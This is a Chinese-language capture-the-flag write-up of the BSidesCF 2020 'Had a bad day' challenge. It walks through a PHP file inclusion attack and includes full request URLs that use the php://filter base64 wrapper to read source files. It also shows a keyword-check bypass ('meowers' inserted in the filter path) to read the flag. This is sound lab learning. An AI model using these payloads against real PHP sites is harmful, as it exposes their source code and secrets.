[BSidesCF 2020]Had a bad day

[BSidesCF 2020]Had a bad day

https://github.com/BSidesSF/ctf-2020-release/

[BSidesCF 2020]Had a bad day_第1张图片

点击两个按钮,url栏的category=      会发生变化

这里是伪协议的知识点:

[BSidesCF 2020]Had a bad day_第2张图片

——摘自:https://blog.csdn.net/weixin_44508748/article/details/108162951.

本题用到的就是filter这个伪协议

所以构造url: http://97621188-63ea-4882-8d39-da8109116ec8.node3.buuoj.cn/index.php?category=php://filter/read=convert.base64-encode/resource=index.php

但是并没有正常得到,看一下报错信息

[BSidesCF 2020]Had a bad day_第3张图片

去掉一个php

http://97621188-63ea-4882-8d39-da8109116ec8.node3.buuoj.cn/index.php?category=php://filter/read=convert.base64-encode/resource=index

然后得到

[BSidesCF 2020]Had a bad day_第4张图片

解码

找到关键部分

  

 

[BSidesCF 2020]Had a bad day_第5张图片

 

那就是只要构造的url中伪协议的参数部分包含woofers meowers index任意一个即可

http://97621188-63ea-4882-8d39-da8109116ec8.node3.buuoj.cn/index.php?category=php://filter/read=convert.base64-encode/meowers/resource=flag

[BSidesCF 2020]Had a bad day_第6张图片

 

 

 

 

你可能感兴趣的:(ctfWP,自己的笔记,php,ctf,伪协议,web,filter)